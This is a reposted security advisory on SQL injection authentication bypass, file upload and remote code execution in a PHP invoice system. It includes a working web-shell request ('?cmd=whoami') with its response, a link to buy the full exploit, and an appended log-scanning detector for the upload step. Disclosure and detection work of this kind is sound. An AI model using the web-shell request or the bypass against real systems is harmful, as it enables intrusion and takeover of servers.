INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
The article describes a high-severity security vulnerability in an invoice system: the application is exposed to SQL injection, which allows an attacker to bypass authentication and then upload a malicious PHP file to achieve remote code execution (RCE), thereby obtaining sensitive information or taking control of the system. 2025-4-9 21:9:22 Author: cxsecurity.com (view original) Views: 10


# Title: INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
# Author: nu11secur1ty
# Date: 04/07/2025
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
# Reference: https://portswigger.net/web-security/sql-injection
# Reference: https://portswigger.net/daily-swig/rce

### Description:

The username parameter appears to be vulnerable to an SQL injection that bypasses authentication. Using this vulnerability, an attacker can log in to the system and then upload a malicious PHP file. After the upload, the attacker can execute that PHP file to obtain sensitive information and, depending on the scenario, take control of the system.

STATUS: HIGH-CRITICAL Vulnerability

[+] Exploit (RCE request):

```http
GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=divmu5157smqqnv6j7efs8br5p
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
```

[+] Response:

```http
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 07:48:39 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

desktop-ahflgug\nu11secur1ty
```

# Reproduce: [href](https://www.patreon.com/posts/invoice-1-c-2025-126106368)
# Buy the full exploit: [href](https://satoshidisk.com/pay/CO7bRi)
# Time spent: 01:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
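Detection logic for the post-upload step of the chain described above, run over constructed Apache access-log lines (an added example, not part of the advisory or the vendor's code): it flags any request for a server-side script under the application's uploads directory, and any request carrying the `cmd` query parameter seen in the advisory's request line. The combined log format, the sample log lines and the benign requests are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit
# Apache "combined" access-log format; only the leading fields are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Extensions Apache with mod_php executes if they land in a web-reachable directory.
EXEC_EXT = {".php", ".phtml", ".php5", ".phar"}
UPLOAD_MARKER = "/uploads/"   # directory segment from the advisory's request line
CMD_PARAM = "cmd"             # query parameter name seen in the advisory's request

def parse_line(line):
    """Split one access-log line into fields; None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parse_qs(parts.query)
    return rec

def classify(rec):
    """Reasons a request resembles the advisory's post-upload execution step."""
    reasons = []
    path = rec["path"].lower()
    if UPLOAD_MARKER in path and posixpath.splitext(path)[1] in EXEC_EXT:
        reasons.append("server-side script requested from upload directory")
    if CMD_PARAM in rec["query"]:
        reasons.append("command-style query parameter")
    return reasons

def scan(lines):
    """Return (client ip, path, status, reasons) for each suspicious request."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        reasons = classify(rec)
        if reasons:
            hits.append((rec["ip"], rec["path"], rec["status"], reasons))
    return hits

# Constructed sample: one line mirroring the advisory's request, two benign, one 404 probe.
SAMPLE_LOG = """\
192.168.100.45 - - [07/Apr/2025:07:48:39 +0000] "GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1" 200 29 "-" "Mozilla/5.0"
10.0.0.7 - - [07/Apr/2025:07:50:02 +0000] "GET /pwnedhost/simple_invoice/uploads/1744008123_logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [07/Apr/2025:07:50:05 +0000] "GET /pwnedhost/simple_invoice/?page=invoices HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
192.168.100.45 - - [07/Apr/2025:07:52:11 +0000] "GET /pwnedhost/simple_invoice/uploads/1744009000_test.phtml HTTP/1.1" 404 196 "-" "curl/8.0"
"""
```

Calling `scan(SAMPLE_LOG.splitlines())` returns the two requests for executable files under `uploads/`, including the 404 probe, and ignores the image and page views; the 404 hit is worth keeping since it shows a client trying to execute a file before a successful upload.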



Copyright 2025, cxsecurity.com

Source: https://cxsecurity.com/issue/WLB-2025040017
For infringement claims, contact: admin#unsafe.sh